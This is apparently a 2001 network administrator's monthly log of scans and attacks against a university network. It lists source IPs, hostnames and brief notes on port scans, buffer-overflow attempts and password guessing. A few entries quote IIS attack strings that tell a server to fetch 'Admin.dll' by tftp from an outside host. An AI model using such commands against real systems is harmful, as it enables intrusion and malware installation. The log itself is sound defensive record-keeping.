Short summary of some of the attacks against us for Dec. 2001

year - time EASTERN  source_ip[:port]  (dns name, if any)  attack/scan/notes

2001/12/01-01:27:41.09 149.160.26.42 (Indiana University Southeast Computing Services) scannet for port 3879
2001/12/01-02:53:14.09 202.90.128.194 (bagyo.pagasa.dost.gov.ph) scannet for port 53, probe bind version number
2001/12/01-06:01:26.91 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scan net for ports 524,137
2001/12/01-06:10:05.57 194.102.114.60 (GENERAL COMTRUST INC,PETROSANI,RO) scan 1 high number port per machine on net, slow scan all day
2001/12/01-07:50:45 64.81.102.137 (dsl081-102-137.den1.dsl.speakeasy.net) scannet for port 22
2001/12/01-09:11:10.21 209.254.179.248 (A020-1010.CHCG.splitrock.net) scan net for port 21
2001/12/01-09:11:39.71 24.254.34.197 (1c1799423-a.wntck1.sfba.home.com) scan net for port 21
2001/12/01-09:14:40.90 205.251.223.147 (Cable Atlantic Inc,NF,CA) scannet for port 21
2001/12/01-11:00:13.87 150.165.13.141 (rt-ab.campus-ii.ufpb.br) scannet for port 111 + buff overflow attacks (statdx)
2001/12/01-11:02:07.03 213.213.52.7 (h213-52-7.NA.albacom.net) scannet for port 515
2001/12/01-23:29:13.61 200.16.144.171 (ppp39-Slot07-Sys5000-1.via-net-works.net.ar) scan net for port 1214
2001/12/02-00:27:02 216.166.147.79:22 (ccs79.cotcomsol.com) scannet for port 22
2001/12/02-06:07:17.26 211.97.168.156 (China United Telecommunications Corporation,CN) slow scan of net for port 80
2001/12/02-06:21:38.16 194.102.114.60 (GENERAL COMTRUST INC,PETROSANI,RO) scan 1 high number port per machine on net, slow scan all day
2001/12/02-07:00:09.90 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 524,137
2001/12/02-11:26:01.49 202.109.255.240 (xm-8163-2,CN) scannet for port 8000
2001/12/02-14:14:05.93 193.41.215.59 (dialup2059.quicknet.se) scannet for port 111
2001/12/02-14:41:45.86 193.41.215.59 (dialup2059.quicknet.se) start of buff overflow attacks on multiple ips. (rstatd)
2001/12/02-22:19:48.34 65.96.105.219 (h0020351f7a12.ne.mediaone.net) scannet for port 111
2001/12/02-22:19:48.78 65.96.105.219 (h0020351f7a12.ne.mediaone.net) start of buff overflow attacks on multiple ips.
2001/12/02-22:29:09.71 64.220.214.19 (w019.z064220214.den-co.dsl.cnc.net) scannet for port 111
2001/12/03-06:23:22.71 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 524,137
2001/12/03-06:23:22.71 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 524,137,139
2001/12/03-07:39:19.50 193.41.215.59 (dialup2059.quicknet.se) scannet for port 111, buff overflow attacks on statd
2001/12/03-07:42:35.74 193.41.215.59 (dialup2059.quicknet.se) scannet for port 111, buf overflow attacks
2001/12/03-14:33:44.11 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for ports 524,137
2001/12/03-14:33:44.11 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for ports 524,137,139
2001/12/03-17:07:16.55 209.242.156.49 (dyn-209-242-156-49.cablemas.com) scannet for port 21
2001/12/03-17:07:43.62 142.177.96.91 (hlfx46-91.ns.sympatico.ca) scan net for port 21
2001/12/03-17:07:43.62 142.177.96.91 (hlfx46-91.ns.sympatico.ca) scannet for port 21
2001/12/03-17:07:45.99 12.233.26.104 (AT&T ITS) scannet for port 21
2001/12/03-17:08:39.76 213.29.13.161 (Alborz Computer Co.,IR) scannet for port 21
2001/12/03-17:09:18.00 12.233.26.104 (AT&T ITS,NJ,US) scannet for port 21
2001/12/03-19:28:17.87 212.27.226.3 (cache.hinet.ee) scan net for port 53
2001/12/03-19:28:24.30 212.27.226.3 (cache.hinet.ee) scannet for port 53
2001/12/03-23:37:07.91 64.124.162.148 (Abovenet Communications, Inc,CA,US) scan 1 high number port per machine on net, slow scan all day
2001/12/04-03:18:48.01 63.227.232.215 (Outerbounds Internet,NM,US) scannet for port 21
2001/12/04-03:18:54.78 172.139.27.108 (AC8B1B6C.ipt.aol.com) scan net for port 21
2001/12/04-03:18:54.78 172.139.27.108 (AC8B1B6C.ipt.aol.com) scan net for port 21
2001/12/04-03:20:32.65 207.65.110.45 (knoxmax1-d-45.planetc.com) scannet for port 21
2001/12/04-03:21:30.08 63.227.232.215 (Outerbounds Internet,NM,US) scannet for port 21
2001/12/05-00:33:01.27 193.251.176.13 (AStrasbourg-101-2-1-13.abo.wanadoo.fr) scannet for port 111
2001/12/05-02:55:43.76 213.93.146.50 (e146050.upc-e.chello.nl) scannet for port 21
2001/12/05-15:47:41.81 204.57.82.21 (ns1.resellerbid.com) scannet for port 515+buff overflow attacks (trojan port 3879)
2001/12/05-21:09:28.42 132.235.203.94 (modem-203-094.dialnet.ohiou.edu) scannet for port 80
2001/12/06-01:27:09.36 217.125.115.86 (217-125-115-86.uc.nombres.ttd.es) scannet for port 21
2001/12/06-13:36:57.09 203.90.81.203 (HCL Infinet Limited,NOIDA,IN) scannet for port 111 + buff overflow attacks - statd
2001/12/06-14:47:57.55 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 137,524
2001/12/06-18:46:24.15 66.35.64.6 (cave.100m.core-3.cmh.enterzone.net) scannet for port 21
2001/12/06-21:44:06.15 63.34.221.159 (2Cust159.tnt6.mel1.da.uu.net) scannet for port 21
2001/12/06-23:11:57.44 63.60.220.252 (1Cust252.tnt9.mel1.da.uu.net) scannet for port 21
2001/12/06-23:23:33.33 217.117.56.173 (217-117-56-173.teledisnet.be) scannet for port 21
2001/12/07-02:00:38.86 202.109.129.36 (Jiangxi province,data and communication bureau leased line,CN) scannet for port 80 sadmind worm
2001/12/07-10:32:23.05 151.25.196.146 (ppp-146-196.25-151.libero.it) scannet for port 23
2001/12/07-11:04:45.88 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 137,524
2001/12/07-15:41:22.15 217.129.239.95 (Cabovisao, televisao por cabo, SA,PT) scannet for port 111
2001/12/07-15:55:53.20 64.124.72.239 (aladdin.headbone.com) scan 1 high number port per machine on net, slow scan all day
2001/12/07-16:01:54.48 132.235.92.20 (?.oucom.ohiou.edu) scannet for port 41524
2001/12/07-18:27:27.51 62.253.140.118 (pc1-ipsw3-0-cust118.cam.cable.ntl.com) scannet for port 21
2001/12/07-20:18:24.04 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scannet for port 80
2001/12/07-21:26:10.87 64.242.29.132 (SAVVIS Communications Corporation,MOP,US) scannet for port 515
2001/12/07-22:07:29.90 80.11.26.43 (AStrasbourg-203-1-2-43.abo.wanadoo.fr) scannet for port 21
2001/12/08-00:24:19.01 64.23.48.70 (owns.the.mafia.org.au) scan 1 high number port per machine on net, slow scan all day
2001/12/08-04:58:23.91 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day
2001/12/08-05:55:22.47 212.11.50.51 (mail.rfd.fr) conn to 132.235.19.90 once per minute (ftp). Try for anon ftp server previously hacked.
2001/12/08-04:58:17.44 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day
2001/12/08-06:08:19.09 213.97.147.104 (Telefonica De Espana SAU,ES) scannet for port 80
2001/12/08-06:08:26.66 213.97.147.104 (Telefonica De Espana SAU,SPAIN) scannet for port 80
2001/12/08-06:22:09.44 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day
2001/12/08-08:03:22.55 208.56.213.209 (teleton.com.mx=Alabanza, Inc.,MD,US) scan 1 high number port per machine on net, slow scan all day
2001/12/08-11:34:07.58 140.119.164.129 (entlab.cs.nccu.edu.tw) scan 1 high number port per machine on net, slow scan all day
2001/12/08-11:41:47.68 140.119.164.129 (entlab.cs.nccu.edu.tw) scan 1 high number port per machine on net, slow scan all day
2001/12/08-19:57:49.76 147.208.171.139 (security.norton.com) portscan 132.235.18.153
2001/12/08-21:21:56 216.163.120.90 (host-216-163-120-90.nrtc.net) scannet for port 22
2001/12/09-05:50:37.73 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day
2001/12/09-05:55:22.47 212.11.50.51 (mail.rfd.fr) conn to 132.235.19.90 once per minute (ftp). Try for anon ftp server previously hacked.
2001/12/09-06:22:09.44 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day
2001/12/09-12:27:07.33 80.13.50.28 (AStrasbourg-203-1-2-28.abo.wanadoo.fr) scannet for port 21
2001/12/09-12:27:11.74 80.13.50.28 (AStrasbourg-203-1-2-28.abo.wanadoo.fr) scan net for port 21
2001/12/09-13:08:13 64.252.209.11 (11.209.252.64.snet.net) scannet for port 22
2001/12/09-13:19:24.44 200.242.252.73 (irc.libnet.com.br) scan 1 high number port per machine on net, slow scan all day
2001/12/09-14:05:08 64.239.53.13 (ns.tablewares.com) scannet for port 25
2001/12/09-18:38:27 216.78.212.40 (adsl-78-212-40.bhm.bellsouth.net) scannet for port 137
2001/12/10-01:10:50 66.38.4.56 (moda056.bbtel.com) scannet for port 22
2001/12/10-01:12:19 24.42.9.3 (cr509255-a.slnt1.on.wave.home.com) scannet for port 22
2001/12/10-02:26:40 141.68.100.1:22 (kommserv1.ba-ravensburg.de) scannet for port 22
2001/12/10-06:09:21.74 216.250.230.43 (ns2.serveur-dns.org) scan 1 high number port per machine on net, slow scan all day
2001/12/10-07:38:56.72 195.96.158.98 (Archway S.r.l,MILANO,IT) scannet for port 515
2001/12/10-08:07:44.44 216.226.156.3 (Janey Huntington,Diamond Bar, CA,US) scan 1 high number port per machine on net, slow scan all day
2001/12/10-17:01:07.42 80.133.89.106 (p5085596A.dip.t-dialin.net) scannet for port 21
2001/12/10-20:36:17.33 128.121.222.209 (zysol2.tempdomainname.com) scan 1 high number port per machine on net, slow scan all day
2001/12/11-01:35:24.01 66.130.110.52 (odemcable052.110-130-66.mtl.mc.videotron.ca) partial scan of net for port 21
2001/12/11-07:53:32.19 66.130.110.52 (odemcable052.110-130-66.mtl.mc.videotron.ca) partial scan of net for port 21
2001/12/11-09:01:56.03 61.160.30.216:1242 (CHINANET Jiangsu province network,CN) attack IIS-buff overflow-tftp admin.dll from 132.237.7.175
2001/12/11-19:22:36.45 132.235.15.159 (water.ece.ohiou.edu) portscan 216.4.62.115 -Business Internet, Inc., FL
2001/12/11-22:34:24.79 131.247.222.88 (delta88.resnet.usf.edu) scannet for port 27374
2001/12/12-05:57:01.79 80.11.32.77 (ALille-101-1-4-77.abo.wanadoo.fr) scannet for port 21
2001/12/12-09:15:34.86 80.11.193.80 (APerpignan-101-1-3-80.abo.wanadoo.fr) scannet for port 21,anon ftp attack
2001/12/12-10:29:58.34 200.33.99.1 (ns.cvca.ulsa.mx) scannet for port 515
2001/12/12-13:12:23.92 80.11.32.77 (ALille-101-1-4-77.abo.wanadoo.fr) scannet for port 21,anon ftp attack
2001/12/12-14:23:49.31 65.164.205.143 (user143.net169.nj.sprint-hsd.net) conn to 132.235.15.20:514
2001/12/12-14:26:40.01 65.164.205.143 (user143.net169.nj.sprint-hsd.net) multiple conns to 132.235.15.20:177
2001/12/12-14:28:04.15 65.164.205.143 (user143.net169.nj.sprint-hsd.net) multiple conns to 132.235.15.[1,20]:177
2001/12/12-15:44:32 132.235.90.7:1029 (Ohio U. Somewhere..) scannet for port 38293
2001/12/12-16:08:12.19 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2001/12/12-20:54:26.66 210.178.150.170 (Korea crap) scannet for port 111
2001/12/12-23:01:24.23 210.178.150.170 (Korea crap) start of buff overflow attacks - rstatd
2001/12/12-23:28:05.16 210.124.41.22 (Korea crap) scannet for port 111
2001/12/13-06:42:08.65 61.182.50.241 (CHINANET Hebei province network,CN) scannet for port 111,+buff overflow attack-statdx
2001/12/13-10:11:35 142.104.35.113 (pt113rtc109.res.uvic.ca) scannet for port 22
2001/12/13-20:55:13.77 216.230.230.148 (as53-p03-wny-133.modempools.net) scannet for port 515-EXPLOIT LPRng overflow
2001/12/13-23:42:23 128.174.192.53 (gal6.ge.uiuc.edu) scannet for port 22
2001/12/14-07:53:58.60 217.0.80.59 (pD900503B.dip.t-dialin.net) scannet for port 80
2001/12/14-07:54:35.01 217.0.80.59 (pD900503B.dip.t-dialin.net) more netscans on port 80.33.207
2001/12/14-18:23:49.90 64.65.15.162 (ns.kantoornet.net) scan 1 high number port per machine on net, slow scan all day
2001/12/14-21:42:44.98 217.0.79.254 (pD9004FFE.dip.t-dialin.net) new attack on IIS - ...does /c+dir/a-r-h-a-s for /a thru /z
2001/12/14-23:10:58.85 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scannet for ports 1080,8080
2001/12/15-08:21:10.53 148.204.211.20 (Instituto Politecnico Nacional,MX) scannet for port 111+buff overflow attacks
2001/12/15-10:30:13.03 61.160.30.233 (CHINANET Jiangsu province network,CN) attack iis server with cmd c+tftp%20-i%20132.237.7.175%20GET%20Admin.dll
2001/12/15-17:41:26.61 217.136.204.86 (adsl-85078.turboline.skynet.be) scannet for port 21
2001/12/16-10:28:27.91 12.233.32.88 (12-233-32-88.client.attbi.com) start of scan on port 80 on random ips (slow scan,many conns)
2001/12/16-13:57:38 213.229.65.6 (meppel2-6.kabel.dekooi.nl) scannet for port 22
2001/12/16-13:57:47.30 12.233.32.88 (12-233-32-88.client.attbi.com) scan net for port 22
2001/12/17-10:04:38.64 216.153.249.228 (host-216-153-249-228.choiceone.net) conn port 23 on 1 machine, then scannet for port 515
2001/12/18-08:19:01.43 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scan net for port 21, anon ftp.
2001/12/18-15:29:33.26 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) 1. ftp to ace as thomas/password, wei/password,ftp
2001/12/18-15:29:33.26 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) 2. get dummy passwd file from ace via ftp.
2001/12/18-16:17:38.74 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) peruse file system on ace as anon/ftp
2001/12/18-16:35:35.86 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) portscan 132.235.1.1
2001/12/18-16:38:18.31 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) try to logon to boss w/ dummy passwds from ace. Sheesh.
2001/12/19-00:47:23.47 205.252.46.98:6667 (babble-on.systems.cais.net) scannet for port 1024 or 3072
2001/12/19-04:27:48.89 61.147.53.73 (CHINANET Jiangsu province network, CN) probe 132.235.1.35:80
2001/12/19-05:58:30.47 155.198.17.120 (wwwcache2.ic.ac.uk) pound on port 80 on 132.235.1.48 (no server running.)
2001/12/19-06:02:45.84 61.132.13.217 (CHINANET Jiangsu province network, CN) probe 132.235.1.35:21
2001/12/19-06:03:04.12 132.235.40.88 (dhcp-040-088.phy.ohiou.edu) probe port 21 on 132.235.1.35
2001/12/19-07:36:46.45 65.69.145.26 (adsl-65-69-145-26.dsl.rcsntx.swbell.net) probe port 111 on several machines + buff overflow attack
2001/12/19-08:34:17.25 61.132.13.186 (CHINANET Jiangsu province network, CN) probe 132.235.1.35:80
2001/12/19-10:08:36 140.116.246.88 (mp01.csie.ncku.edu.tw) scannet for port 111
2001/12/19-10:08:36.80 140.116.246.88 (mp01.csie.ncku.edu.tw) scannet for port 111
2001/12/19-10:32:26 217.81.161.2 (pD951A102.dip.t-dialin.net) scannet for port 21
2001/12/19-10:32:26.35 217.81.161.27 (pD951A11B.dip.t-dialin.net) scannet for port 21
2001/12/19-11:54:44.70 140.116.246.88 (mp01.csie.ncku.edu.tw) start of buff overflow attacks - rstatd
2001/12/19-14:48:08.99 208.183.225.3 (e0.filt1.shelby.tn.ena.net) >100 connects on 132.235.1.106:80 (no server running...)
2001/12/19-16:00:00 24.93.183.6:22 (a1-3d006.neo.lrun.com) scannet for port 22
2001/12/19-21:32:04 32.102.213.247 (slip-32-102-213-247.fl.us.prserv.net) scan net for port 25
2001/12/19-23:06:33 24.67.30.87:22 (h24-67-30-87.cg.shawcable.net) scannet for port 22
2001/12/19-23:59:27.77 217.153.3.161 (Internet Technologies Polska, PL) scan 1 high number port per machine on net, slow scan all day
2001/12/20-00:52:22.40 66.27.135.157 (sc-66-27-135-157.socal.rr.com) probe ports 445,139,137,23,21 on 132.235.1.[1,2]
2001/12/20-01:05:06 209.9.142.70 (209-9-142-70.sdsl.cais.net) scannet for port 22
2001/12/20-06:04:40.65 61.147.60.195 (CHINANET Jiangsu province network) conn to 132.235.1.35 port 80
2001/12/20-06:10:36.42 217.153.3.161 (Internet Technologies Polska) scan 1 high number port per machine on net, slow scan all day
2001/12/20-06:19:22.44 172.183.20.6 (ACB71406.ipt.aol.com) scan 1 high number port per machine on net, slow scan all day
2001/12/20-20:22:35.51 64.23.82.102 (Auction4Biz.net) scannet for port 1433,445,139
2001/12/20-21:10:53.24 64.27.86.111 (dns.ultrahosting.com) scan 1 high number port per machine on net, slow scan all day
2001/12/21-13:33:24.61 209.21.128.246:22 () scannet for port 22
2001/12/21-13:37:07.06 155.239.70.68 () scannet for port 21
2001/12/22-17:00:37.30 172.188.140.230 () scannet for port 21
2001/12/22-17:06:33.12 64.158.213.138 () scannet for port 80
2001/12/23-01:11:22.05 210.77.145.30 () scannet for port 60001
2001/12/23-01:14:20.95 80.11.32.2 () scannet for port 21
2001/12/23-01:38:44.58 61.132.13.186 () probe port 80 on 132.235.1.35 again
2001/12/23-01:56:10.68 212.226.35.5 () scannet for port 80
2001/12/23-03:15:34.57 194.66.92.238 () scannet for port 21
2001/12/24-00:34:23 210.81.122.25 () scannet for port 111
2001/12/24-07:22:39.23 195.8.255.47:22 () scannet for port 22
2001/12/24-20:20:33 128.220.24.81:22 () scannet for port 22
2001/12/25-06:45:40.95 12.233.26.35 () scannet for port 80
2001/12/25-23:39:29.14 211.158.6.20 () scannet for port 111
2001/12/25-23:40:00.14 24.42.93.109 () scannet for port 21
2001/12/26-00:57:46.29 151.100.41.2 () scannet for port 111
2001/12/26-15:40:43.02 195.205.21.167 () scannet for port 53
2001/12/26-19:27:21.88 80.130.216.103 () scannet for port 21
2001/12/26-22:16:44.05 61.177.255.229 () scannet for port 21
2001/12/27-00:46:43.27 137.48.16.58 () scannet for port 21
2001/12/27-06:21:06 195.249.123.123:22 () scannet for port 22
2001/12/27-07:57:46 216.33.232.228 () scannet for port 1433
2001/12/27-12:48:13 62.14.144.249 () scannet for port 4960[6,7,8,9] 80 all UDP
2001/12/27-22:55:30 216.78.213.55:1025 () scannet for port 137 UDP
2001/12/28-09:41:11.77 212.205.235.10 () try to login to various ips with decrypted dummy passwords from ace
2001/12/28-09:46:56.75 212.205.235.10 () try to relay mail try 132.235.1.1
2001/12/28-17:28:13.71 169.139.115.220 () scannet for port 21
2001/12/28-21:34:33 12.236.143.111 () scannet for port 515,23,53
2001/12/29-06:19:13.39 211.62.84.2 () scannet for port 53
2001/12/29-12:53:31.68 80.130.175.155 () scannet for port 119
2001/12/29-15:50:45.30 80.13.219.155 () scannet for port 21
2001/12/29-16:22:42.55 193.252.177.190 () scannet for port 21
2001/12/29-16:44:27.27 130.182.162.192 () scannet for port 110
2001/12/29-21:18:11.40 193.252.8.79 () scannet for port 21
2001/12/29-22:23:34.82 63.94.220.143 () scannet for port 111
2001/12/29-22:23:46.38 63.94.220.143 () start of buff overflow attacks
2001/12/30-03:23:49.97 61.177.61.242 (CHINANET Jiangsu province network,CN) 1. attack windows IIS server via buffer overflow
2001/12/30-03:23:49.97 61.177.61.242 (CHINANET Jiangsu province network,CN) 2. attacks last all day long, with particular attack of
2001/12/30-03:23:49.97 61.177.61.242 (CHINANET Jiangsu province network,CN) 3. tftp%20-i%20132.232.9.18%20GET%20Admin.dll%20c:\Admin.dll
2001/12/30-04:29:31.47 193.252.177.190 () scannet for port 21
2001/12/30-05:29:35.17 80.13.219.155 () scannet for port 21
2001/12/30-05:47:20.77 12.86.120.24 () portscan 132.235.2.184 ports 1-1023
2001/12/30-06:17:01.78 24.251.138.48 () portscan 132.235.2.184
2001/12/30-13:11:16.90 217.120.172.218 () scannet for port 111
2001/12/30-22:54:02.49 200.250.8.1 () scan 1 high number port per machine on net, slow scan all day
2001/12/31-01:04:47.89 61.147.59.74 () ftp probe on 132.235.1.35
2001/12/31-02:06:47.36 61.147.44.198 () using 132.235.1.70:53 to lookup porn sites
2001/12/31-14:52:44.07 211.225.219.52 () scan port 111 on 132.235.1.1